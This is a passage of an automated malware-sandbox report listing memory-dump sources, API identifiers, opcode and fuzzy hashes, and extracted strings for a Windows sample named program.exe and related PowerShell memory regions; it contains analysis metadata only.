                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                                                                  • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                  • Instruction ID: 456a85463ffdc7f94a5d37425dee7b1e58438086be9ef758e12bc11d0159c845
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30518E22E046418AF711EF61D8513BDB7B2FB68B68F644539DB0947B88DF3CD4408B60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                                                  • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction ID: b2b7638f0be3dba353e948db6fc7c658ebe20f7f021b8a8a3537daf0698cbfa2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0211E931A0C14242F656A769ED4927A9353FFA47E0FD44030DB4907B8DCD2DD4D58A10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                  • Instruction ID: 9497ebfe237829fba5ad6f0ae8ddd71a8962e52b33c5ec32f40ebd45b48d8dda
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7114C36B14B068AEB009F60EC452B973A4FB69768F840E31DA2D467A4DF78D1688750
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
• API String ID: 3568877910-384499812
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: 00007F6570
• String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
• API String ID: 118773457-118859582
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C669046
  • Part of subcall function 00007FF72C66A948: HeapFree.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
  • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72C65CBA5), ref: 00007FF72C669064
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Roaming\program.exe
• API String ID: 3580290477-4122129678
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
Similarity
• API ID: 00007F6570
• String ID: _constructors$openssl_
• API String ID: 118773457-3359357282
                                                                                                                                                                                                                                  • Opcode ID: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
                                                                                                                                                                                                                                  • Instruction ID: c80ce811392c308ebd37866dcf9433f7e70a4bbdc64e0658733aba577d957777
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531C7A1A0AF02C2EE168B76E9D423827E5AF49F91F144875CE5D027B5EF3CE9558700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007A6164124
                                                                                                                                                                                                                                  • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                                  • API String ID: 1326084662-4266787399
                                                                                                                                                                                                                                  • Opcode ID: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                                  • Instruction ID: 6d4942af2cc343f7e0b049a9721c25c27cefc5ab17265389faf7f74daf4b42a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4316DA2A0EF82C2EA12CB22E49037963A0FB89B94F444A35DE5D47B74DF7CE0458700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                  • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                  • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                  • Instruction ID: c12eb4af9d160b01c4277120f7809184ff5c60f3f1b5136144f09e309b0ebe1d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A21E3F3A0964686DBA58F39E44027D7AEAE789F84F448035DE5DC7754DE3CD1908700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                  • Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                  • Instruction ID: e6e70bc9d0cd5a71794d595a94ef130351871ab5e2c65e8bef176cd5383bb8e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D821F562B0828185EB22AB11D84426DB3B3FBA8B54FE54039D64D83684CF7DE5448F62
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessorcapture_previous_context
                                                                                                                                                                                                                                  • String ID: ]>mBD
                                                                                                                                                                                                                                  • API String ID: 3936158736-976336857
                                                                                                                                                                                                                                  • Opcode ID: 745c3c7e2ecbac46d3d9f63b96358e37d6256b4498188150111cc3e990b537a2
                                                                                                                                                                                                                                  • Instruction ID: 3227f4c58ef33ba79d7fe40d5d2db5dffb5978cf2b869d68881137dea8440503
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 745c3c7e2ecbac46d3d9f63b96358e37d6256b4498188150111cc3e990b537a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD21D8B4A0AB02C5FA829F24F85137566A8FF88344F9055B5ED8D863A1EF7DE446C720
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                  • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                  • Instruction ID: d52d067b7d8bfc96dad9dc48c807845a0d80928504ad2c331d0c2c5901975ec5
• Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction Fuzzy Hash: B9112E32619B8182EB629F15E840269B7E5FB98B94F584630DB8D07758DF3DD5518B00
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction ID: de437b14411f05c41366f98addbcf7da6c64e9c8c915a142f4c2d4a1453642d3
• Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction Fuzzy Hash: EF01842191864385F722BF60986227EB7A1FFA8768FD01839D54D42685DF3CD5098F74
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: Time$System$File
• String ID: gfff
• API String ID: 2838179519-1553575800
• Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
• Instruction ID: 53a3fcbbbdb8a7748ea9ee64eee5f48c79deb23fae11a93c538b12fb88325fb6
• Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
• Instruction Fuzzy Hash: BC01FEE2B1554542DF61DB35F80115967D1F7DCB84B449032EA5DCBB55EE3CD241C700
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: getprotobyname
• String ID: protocol not found$s:getprotobyname
• API String ID: 402843736-630402058
• Opcode ID: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
• Instruction ID: 5f5328f38836413f8954341cb03060f73fe994e0e83107b506fced1793bd4335
• Opcode Fuzzy Hash: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
• Instruction Fuzzy Hash: A4015EA5A1EA42C2EA12CB31E9C407D23A8FF88B84B540471ED4E47B25DF2DE426C320
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: inet_addr
• String ID: 255.255.255.255$illegal IP address string passed to inet_aton
• API String ID: 1393076350-3844699235
• Opcode ID: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
• Instruction ID: f37dd553680df0e616e8ef051ff90420514b177e6f0b70c899febfb0e48bc12a
• Opcode Fuzzy Hash: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
• Instruction Fuzzy Hash: A9F044E1A19A02D5EA119B31E8C407D2369AF85750F5411B1FD1E463A5DF2CE46A8710
Memory Dump Source
• Source File: 00000014.00000002.1874952484.00007FFB4A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ffb4a210000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dae25da9e49e841a2b2c384bfcd7dafd8429338239d0d41eda6840b85dc88e46
• Instruction ID: 21dd8dbbaa7d7384b97dfc812afe18835a671af44063bc1c72fef3a183a27bb7
• Opcode Fuzzy Hash: dae25da9e49e841a2b2c384bfcd7dafd8429338239d0d41eda6840b85dc88e46
• Instruction Fuzzy Hash: 2BD135B190EA8A4FE79ABF7888145B97FE5EF55310B2800FED44DC7093DA18AD05E391
Memory Dump Source
• Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 83c071af7a63d6228d1271d6682501e39cbcaf00b591b10377b0bf2ff7490555
• Instruction ID: ced3a318d4ca9b080845b92749e2ce58d04ac3c0c2a9b95e31485c5e6d10157d
• Opcode Fuzzy Hash: 83c071af7a63d6228d1271d6682501e39cbcaf00b591b10377b0bf2ff7490555
• Instruction Fuzzy Hash: 5B6104B290D79A4FE706EF3CAC561E97FA4EF53321F1841BBD48887193DA156805CB82
Memory Dump Source
• Source File: 00000014.00000002.1871033325.00007FFB4A02D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A02D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ffb4a02d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3682e83f9d236c00ae3a12c032e46de12f1dd4ae224df98f9770f55a81654048
• Instruction ID: d4626e136ef6458004b01f8ca828a2972f75dc0ac7ec4490c93f707da92f2bef
• Opcode Fuzzy Hash: 3682e83f9d236c00ae3a12c032e46de12f1dd4ae224df98f9770f55a81654048
• Instruction Fuzzy Hash: 6441FF7180DBC44FE7569F3898559523FF4EF52224B1906EFE088CB2A3D625AC46C792
Memory Dump Source
• Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 99294cc549ab4c3a0e60232f8e1f0a1c61150cbd3bfcaec80403c63aec67338a
                                                                                                                                                                                                                                  • Instruction ID: 736edfba5047da56ab7ad163ae396ac574bc01ab011f73c20099f1fcdd13028c
